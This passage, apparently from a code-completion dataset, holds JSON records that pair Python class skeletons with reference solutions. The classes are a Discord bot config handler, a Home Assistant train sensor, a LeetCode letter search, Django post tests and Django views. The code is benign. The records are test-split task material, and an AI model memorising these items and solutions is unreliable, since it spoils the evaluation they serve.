"stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. 
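The Bot record's load_config/save_config pair is plain JSON persistence: load merges a dict from disk into self.config rather than replacing it, and save writes it back sorted and indented. A small standalone sketch of the same load/merge/save cycle, with the discord/aiohttp machinery stripped out; the Config class name and the tempfile path here are illustrations, not the record's:

# Standalone sketch of the load/merge/save cycle used by the Bot record
# above; plain dict + json, no bot framework involved.
import json
import os
import tempfile


class Config:
    def __init__(self, config_file='config.json'):
        self.config = {}
        self.config_file = config_file

    def load(self, filename=None):
        with open(filename or self.config_file) as f:
            data = json.load(f)
        if isinstance(data, dict):      # merge into existing config, don't replace
            self.config.update(data)

    def save(self, filename=None):
        with open(filename or self.config_file, 'w') as f:
            json.dump(self.config, f, indent=4, sort_keys=True)


with tempfile.NamedTemporaryFile('w', suffix='.json', delete=False) as tmp:
    json.dump({'prefix': '!', 'owner_id': 42}, tmp)

cfg = Config(tmp.name)
cfg.load()
cfg.config['prefix'] = '?'   # mutate one key, keep the rest
cfg.save()

cfg2 = Config(tmp.name)
cfg2.load()
assert cfg2.config == {'prefix': '?', 'owner_id': 42}
os.unlink(tmp.name)          # clean up the temporary file

Merging with update() instead of assignment is what lets load_config be called repeatedly over several files without losing keys set earlier.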
This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "k2/core.py", "source_repo": "DasWolke/kitsuchan-2", "split": "test", "star_events_count": 1} {"blob_id": "54ac2e5bc9ae8d48b98b2d59e47134e45b5050f6", "bodies": ["self._train_api = train_api\nself._from_station = from_station\nself._to_station = to_station\nself._weekday = weekday\nself._time = departuretime\nself._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\nif TYPE_CHECKING:\n assert from_station.name and to_station.name\nself._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)", "when = dt.now()\n_state: TrainStop | None = None\nif self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\ntry:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\nexcept (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\nif not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\nself._attr_available = True\nif TYPE_CHECKING:\n assert _state.advertised_time_at_location\nself._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\nif _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\nif _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\nself._update_attributes(_state)", "attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\nif (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\nif (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\nif (est_time := 
state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\nif (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\nif (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\nif (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\nself._attr_extra_state_attributes = attributes"], "bodies_text": "<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "class_docstring": "Contains data about a train depature.", "class_name": "TrainSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TrainSensor:\n 
\"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000095", "length_bytes": 7335, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def 
__init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None"}, {"docstring": "Retrieve latest state.", "name": "async_update", "signature": "async def async_update(self) -> None"}, {"docstring": "Return extra state attributes.", "name": "_update_attributes", "signature": "def _update_attributes(self, state: TrainStop) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005692", "prompt": "Implement the Python class `TrainSensor` described below.\n\nClass description:\nContains data about a train depature.\n\nMethod signatures and docstrings:\n- def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None: Initialize the sensor.\n- async def async_update(self) -> None: Retrieve latest state.\n- def _update_attributes(self, state: TrainStop) -> None: Return extra state attributes.", "prompted_full_text": "Implement the Python class `TrainSensor` described below.\n\nClass description:\nContains data about a train depature.\n\nMethod signatures and docstrings:\n- def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None: Initialize the sensor.\n- async def async_update(self) -> None: Retrieve latest state.\n- def _update_attributes(self, state: TrainStop) -> None: Return extra state attributes.\n\n<|skeleton|>\nclass TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n 
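TrainSensor's _update_attributes flattens optional TrainStop fields into a state-attribute dict, converting the delay timedelta to minutes via total_seconds() / 60 and the timestamps to ISO strings. A reduced sketch of that conversion follows; Stop is a hypothetical stand-in for pytrafikverket's TrainStop, and the attribute keys are simplified from the record's ATTR_* constants:

# Reduced sketch of TrainSensor._update_attributes: optional fields become
# a flat attribute dict, and the delay timedelta becomes minutes.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Stop:
    advertised_time_at_location: Optional[datetime]
    estimated_time_at_location: Optional[datetime]

    def get_delay_time(self) -> Optional[timedelta]:
        if self.advertised_time_at_location and self.estimated_time_at_location:
            return self.estimated_time_at_location - self.advertised_time_at_location
        return None


def build_attributes(stop: Stop) -> dict:
    attrs = {'delay_time': None, 'planned_time': None, 'estimated_time': None}
    if (delay := stop.get_delay_time()):
        attrs['delay_time'] = delay.total_seconds() / 60   # timedelta -> minutes
    if (advertised := stop.advertised_time_at_location):
        attrs['planned_time'] = advertised.isoformat()
    if (estimated := stop.estimated_time_at_location):
        attrs['estimated_time'] = estimated.isoformat()
    return attrs


stop = Stop(datetime(2023, 5, 1, 8, 0), datetime(2023, 5, 1, 8, 12))
assert build_attributes(stop)['delay_time'] == 12.0

The walrus-operator guards mirror the record's style: each attribute is only filled in when the upstream API actually supplied the field, so missing data stays None instead of raising.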
self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "revision_id": "2e65b77b2b5c17919939481f327963abdfdc53f0", "skeleton": "<|skeleton|>\nclass TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await 
self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/trafikverket_train/sensor.py", "source_repo": "konnected-io/home-assistant", "split": "test", "star_events_count": 24} {"blob_id": "9003dd21cb8c403c2aa2935edf6a750781ac3ed4", "bodies": ["first = None\nheapq.heapify(letters)\nwhile len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\nreturn first", "for letter in letters:\n if letter > target:\n return letter\nreturn letters[0]"], "bodies_text": "<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return 
letters[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000096", "length_bytes": 3138, "license_type": "no_license", "methods": [{"docstring": ":type letters: List[str] :type target: str :rtype: str", "name": "nextGreatestLetter", "signature": "def nextGreatestLetter(self, letters, target)"}, {"docstring": ":type letters: List[str] :type target: str :rtype: str", "name": "nextGreatestLetter1", "signature": "def nextGreatestLetter1(self, letters, target)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005236", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextGreatestLetter(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n- def nextGreatestLetter1(self, letters, target): :type letters: List[str] :type target: str :rtype: str", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextGreatestLetter(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n- def nextGreatestLetter1(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n\n<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n<|end_body_1|>\n", "revision_id": "233d12deca34f51c3bb0406831cc07f3b72b50cf", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "Python/Find Smallest Letter Greater Than Target/main.py", "source_repo": "briansu2004/MyLeet", "split": "test", "star_events_count": 1} {"blob_id": "9969bb43a3acffc8f2c9d7912512c9c95b79404c", "bodies": ["post = PostFactory()\ncomment = PostFactory()\npost.add_comment(comment)\nself.assertEqual(comment.title, post.title)\nself.assertTrue(comment.is_comment)\nself.assertEqual(comment.parent_post, post)", "post = PostFactory()\nreactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\nfor 
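The Solution record above (source_path "Find Smallest Letter Greater Than Target") shows a linear scan and a heap-based variant. Since the input in that original problem is a sorted list, the same wraparound lookup can also be done in O(log n) with bisect; this is an alternative sketch, not the record's code:

# O(log n) variant of nextGreatestLetter using bisect. The record's own
# versions use a linear scan and a heap; this one assumes letters is sorted,
# per the original problem statement. Wraps to letters[0] when no letter
# exceeds the target, matching the record's behavior.
import bisect


def next_greatest_letter(letters, target):
    i = bisect.bisect_right(letters, target)   # first index with letter > target
    return letters[i % len(letters)]           # wrap around to the smallest letter


assert next_greatest_letter(['c', 'f', 'j'], 'a') == 'c'
assert next_greatest_letter(['c', 'f', 'j'], 'c') == 'f'
assert next_greatest_letter(['c', 'f', 'j'], 'k') == 'c'  # wraparound case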
reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\nself.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])"], "bodies_text": "<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TestPost", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000097", "length_bytes": 1139, "license_type": "no_license", "methods": [{"docstring": "Test adding comment to post", "name": "test_add_comment", "signature": "def test_add_comment(self)"}, {"docstring": "Test function return correct urls with count", "name": "test_get_reaction_count", "signature": "def test_get_reaction_count(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001438", "prompt": "Implement the Python class `TestPost` described below.\n\nClass description:\nImplement the TestPost class.\n\nMethod signatures and docstrings:\n- def test_add_comment(self): Test adding comment to post\n- def test_get_reaction_count(self): Test function return correct urls with count", "prompted_full_text": "Implement the Python class `TestPost` described below.\n\nClass description:\nImplement the TestPost class.\n\nMethod signatures and docstrings:\n- def test_add_comment(self): Test adding comment to post\n- def test_get_reaction_count(self): Test function return correct urls with count\n\n<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n 
